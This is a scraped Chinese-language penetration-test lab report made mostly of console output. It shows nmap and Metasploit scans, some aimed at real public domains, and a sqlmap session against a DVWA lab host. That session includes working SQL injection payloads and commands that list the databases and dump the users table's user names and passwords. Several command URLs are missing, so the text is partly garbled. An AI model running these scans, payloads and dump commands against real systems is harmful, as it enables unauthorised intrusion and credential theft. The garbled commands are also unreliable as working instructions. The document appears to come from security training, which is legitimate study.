渗透测试 实验报告(中国移动安全部)

发布时间 : 星期一 文章渗透测试 实验报告(中国移动安全部)更新完毕开始阅读

MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

msf > nmap -PO -script=smb-check-vulns 10.10.10.254 [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:47 CST Nmap scan report for 10.10.10.254 Host is up (0.00021s latency).

All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)

map done: 1 IP address (1 host up) scanned in 23.06 seconds

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

msf > nmap -O www.ctsi.com.cn [*] exec: nmap -O www.ctsi.com.cn

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 17:16 CST Nmap scan report for www.ctsi.com.cn (211.100.35.132) Host is up (0.0054s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)

No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

msf > use auxiliary/scanner/http/dir_scanner msf auxiliary(dir_scanner) > set THREADS 50 THREADS => 50

msf auxiliary(dir_scanner) > set RHOSTS www.http://www.china-audit.com/

RHOSTS => www.http://www.china-audit.com/ msf auxiliary(dir_scanner) > run

[*] Detecting error code [*] Detecting error code

[*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed

sqlmap 检查sql注入的漏洞

root@kali:~# sqlmap

root@kali:~# sqlmap -u \--cookie=\

带cookie的方式查出这个网站数据库的用户和密码

sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:50:20

[11:50:20] [INFO] testing connection to the target URL

[11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds [11:50:21] [INFO] target URL is stable

[11:50:21] [INFO] testing if GET parameter 'id' is dynamic

[11:50:21] [INFO] confirming that GET parameter 'id' is dynamic [11:50:21] [INFO] GET parameter 'id' is dynamic

[11:50:21] [INFO] heuristics detected web page charset 'ascii'

[11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')

[11:50:21] [INFO] testing for SQL injection on GET parameter 'id'

heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [11:50:25] [WARNING] reflective value(s) found and filtering out

[11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

[11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[11:50:25] [INFO] testing 'MySQL inline queries'

[11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...........

[11:50:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable

[11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[11:50:36] [INFO] target URL appears to have 2 columns in query

[11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 41 HTTP(s) requests: ---

Place: GET Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit ---

[11:50:40] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS: MySQL 5.0 [11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.10.10.129'

[*] shutting down at 11:50:40

root@kali:~# sqlmap -u \--cookie=\ -p id --dbs

可以看出返回数据库为:

[11:53:32] [WARNING] reflective value(s) found and filtering out available databases [2]: [*] dvwa

[*] information_schema

root@kali:~# sqlmap -u \--cookie=\-p id -D dvwa --tables 查看dvwa数据库 Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+

root@kali:~# sqlmap -u \--cookie=\PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23\-p id -D dvwa -T users --columns

Database: dvwa Table: users [6 columns]

+------------+-------------+

| Column | Type | +------------+-------------+

| user | varchar(15) | | avatar | varchar(70) | | first_name | varchar(15) | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +------------+-------------+

root@kali:~# sqlmap -u \--cookie=\PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23\-p id -D dvwa -T users -C user,password --dump Database: dvwa

联系合同范文客服:xxxxx#qq.com(#替换为@)